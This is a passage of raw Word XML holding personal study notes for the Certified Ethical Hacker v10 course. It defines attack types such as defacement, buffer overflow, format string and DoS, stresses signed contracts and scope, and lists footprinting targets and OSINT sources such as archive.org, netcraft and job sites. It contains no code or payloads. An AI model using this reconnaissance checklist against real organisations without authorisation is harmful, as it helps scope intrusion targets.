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567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Certified Ethical Hacker v10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="000748A0" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="00F53FB3" w:rsidRPr="006B0CAC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=WVKbfxo_pwE</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="006D23FF" w:rsidRDefault="006D23FF" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t xml:space="preserve">SABA &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>Skillsoft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t xml:space="preserve"> Online Learning &gt; Certification &gt; EC-Council</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F53FB3" w:rsidRDefault="00F53FB3" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F53FB3" w:rsidRPr="00F53FB3" w:rsidRDefault="00F53FB3" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F53FB3">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Not the best notes yet, still a work in progress.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kevin </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mitnick</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - Possibly buy his book?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>osstmm.pdf - Methodology document about testing security.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Certainly something to have a look at.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>OISSG - Methodology targeted towards Pen-Testing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Probably more </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>relevant</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>**Types of Attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00B7113E" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Website defacement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an attack on a website that changes the visual appearance of the site or a webpage. These are typically the work of </w:t>
      </w:r>
      <w:r w:rsidRPr="00B7113E">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>defacers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, who break into a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B7113E">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>web server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> and replace the hosted </w:t>
      </w:r>
      <w:r w:rsidRPr="00B7113E">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>website</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> with one of their own. Defacement is generally meant as a kind of electronic </w:t>
      </w:r>
      <w:r w:rsidRPr="00B7113E">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>graffiti</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> and, as other forms of </w:t>
      </w:r>
      <w:r w:rsidRPr="00B7113E">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>vandalism</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, is also used to spread messages by </w:t>
      </w:r>
      <w:r w:rsidRPr="00B7113E">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>politically</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> motivated "cyber protesters" or hacktivists.</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve">Idea of digital </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>graffiti</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t>. Normally done to websites where an attacker will deface an organisation's webpage.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00B7113E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Buffer Overflow</w:t>
      </w:r>
      <w:r w:rsidR="00B7113E">
        <w:t xml:space="preserve"> is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> when</w:t>
      </w:r>
      <w:r w:rsidR="00B7113E">
        <w:t xml:space="preserve"> an attacker sends more data </w:t>
      </w:r>
      <w:r>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00B7113E">
        <w:t xml:space="preserve">han expected to a program which </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">can </w:t>
      </w:r>
      <w:r w:rsidR="00B7113E">
        <w:t xml:space="preserve">cause the </w:t>
      </w:r>
      <w:r>
        <w:t>buffer</w:t>
      </w:r>
      <w:r w:rsidR="00B7113E">
        <w:t xml:space="preserve"> to overflow which in turn causes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> causing memory leak. </w:t>
      </w:r>
      <w:r w:rsidR="00B7113E">
        <w:t>The a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ttacker can </w:t>
      </w:r>
      <w:r w:rsidR="00B7113E">
        <w:t xml:space="preserve">gain </w:t>
      </w:r>
      <w:r>
        <w:t>control</w:t>
      </w:r>
      <w:r w:rsidR="00B7113E">
        <w:t xml:space="preserve"> of the memory stack and insert</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> executables</w:t>
      </w:r>
      <w:r w:rsidR="00B7113E">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00B7113E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Format String Attacks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - C programming language makes use of "format string" to determine how data is going to be input/output. If a programmer leaves this out then an </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can gain control</w:t>
      </w:r>
      <w:r w:rsidR="00B7113E">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00B7113E">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>The Format String exploit occurs when the submitted data of an input string is evaluated as a command by the application. In this way, the attacker could execute code, read the stack, or cause a segmentation fault in the running application, causing new behaviors that could compromise the security or the stability of the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00B7113E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Denial of Service</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - SYN flood, PING flood, SMURF attack, malformed packets</w:t>
      </w:r>
      <w:r w:rsidR="00B7113E">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00B7113E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Distributed Denial of Service</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - coordinated D</w:t>
      </w:r>
      <w:r w:rsidR="00B7113E">
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>S making use of several hosts in several locations. Making use of "botnets"</w:t>
      </w:r>
      <w:r w:rsidR="00B7113E">
        <w:t>. Controlled by a “Master”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00B7113E" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>As a Pen Tester ensure that you g</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve">et a </w:t>
      </w:r>
      <w:r w:rsidR="003B567C" w:rsidRPr="001C007B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>very detailed signed contract</w:t>
      </w:r>
      <w:r w:rsidRPr="001C007B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> from your employer</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Ensure </w:t>
      </w:r>
      <w:r w:rsidR="001C007B">
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>hat the scope of the pen test is clearly defined with boundaries put in place. While going about your pen test always make sure you operate within the boundaries of your contract and do not exceed the scope of the test as this will open you up to legal issues.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0056619B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Security Assessment</w:t>
      </w:r>
      <w:r w:rsidR="0056619B">
        <w:t xml:space="preserve"> is similar to a pen test however these are normally carried out </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">hand-in-hand with the employer, check all security and provide advice on how to mitigate the vulnerability. </w:t>
      </w:r>
      <w:r w:rsidR="0056619B">
        <w:t>These look</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> at procedures and policies. Looks at more vectors than a pen-test. Very comprehensive. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Pen-tests may provide unrealistic view</w:t>
      </w:r>
      <w:r w:rsidR="0056619B">
        <w:t xml:space="preserve"> of the network from a security stand point</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - if no penetration in a week, </w:t>
      </w:r>
      <w:r w:rsidR="0056619B">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:t>organisation may feel like they are "secure"</w:t>
      </w:r>
      <w:r w:rsidR="0056619B">
        <w:t xml:space="preserve"> and not beef up their security. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009E1404" w:rsidRDefault="009E1404" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>**</w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>Foot Printing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="0056619B" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Foot printing is the process of f</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t>inding out as much as possible about the target</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from easily available sources</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>It is p</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve">robably </w:t>
      </w:r>
      <w:r>
        <w:t>a good idea to start</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> some sort of excel </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">spreadsheet </w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r>
        <w:t>Word</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> document </w:t>
      </w:r>
      <w:r>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t>o keep track of everything you learn.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The kind of thing you will be looking to learn:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00124068" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Domain</w:t>
      </w:r>
      <w:r w:rsidR="0056619B">
        <w:t xml:space="preserve"> names</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00124068" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Network</w:t>
      </w:r>
      <w:r w:rsidR="0056619B">
        <w:t xml:space="preserve"> blocks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00124068" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Specific</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> IP address (web, email, </w:t>
      </w:r>
      <w:r w:rsidR="0056619B">
        <w:t xml:space="preserve">proxy, and any </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003B567C">
        <w:t>db</w:t>
      </w:r>
      <w:r w:rsidR="0056619B">
        <w:t>s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0056619B">
        <w:t xml:space="preserve"> on the network</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="0056619B" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>System architecture</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ACL information from port scans </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00124068" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>What</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> IDS platform is in </w:t>
      </w:r>
      <w:r>
        <w:t>use?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">System enumeration (username, group names), </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>System banners, r</w:t>
      </w:r>
      <w:r w:rsidR="0056619B">
        <w:t xml:space="preserve">outing tables, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0056619B">
        <w:t>snmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0056619B">
        <w:t xml:space="preserve"> information</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="0056619B" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>DNS hostnames</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Networking protocols (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/ip, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>decnet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>appletalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00124068" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Internal</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> DNS? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Remote access possibilities (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vpn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, dialup) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Extranet? </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>Connection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> points? </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>Access</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> control? </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>Public</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or private?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Do some digging:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="003940B4" w:rsidRDefault="00124068" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00244586">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00244586">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>archive.org</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  --</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003940B4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003940B4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>WayB</w:t>
      </w:r>
      <w:r w:rsidR="003B567C" w:rsidRPr="003940B4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ack</w:t>
      </w:r>
      <w:r w:rsidRPr="003940B4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>When</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003B567C" w:rsidRPr="003940B4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Machine</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t>, can sometimes find out some sensitive information about companies that has since been removed.</w:t>
      </w:r>
      <w:r w:rsidR="0056619B">
        <w:t xml:space="preserve"> Co</w:t>
      </w:r>
      <w:r w:rsidR="003940B4">
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidR="0056619B">
        <w:t xml:space="preserve">panies used to publish all sorts of information before security impact was realised. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00244586">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>http://netcraft.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -- Internet research website. Can find out what internet webservers are being used by websites. Can learn what version webserver is being run, search for vulnerabilities to match.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00244586">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>http://www.monster.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -- Recruiting Websites provide loads of valuable information about what services and te</w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>chnology that might be in use. There m</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ight also be a chance of obtaining an internal email address if it's a carless </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t xml:space="preserve">advert. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>LinkedIn, Facebook, Twitter, Glass Door, Reed, Indeed, Reddit...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**</w:t>
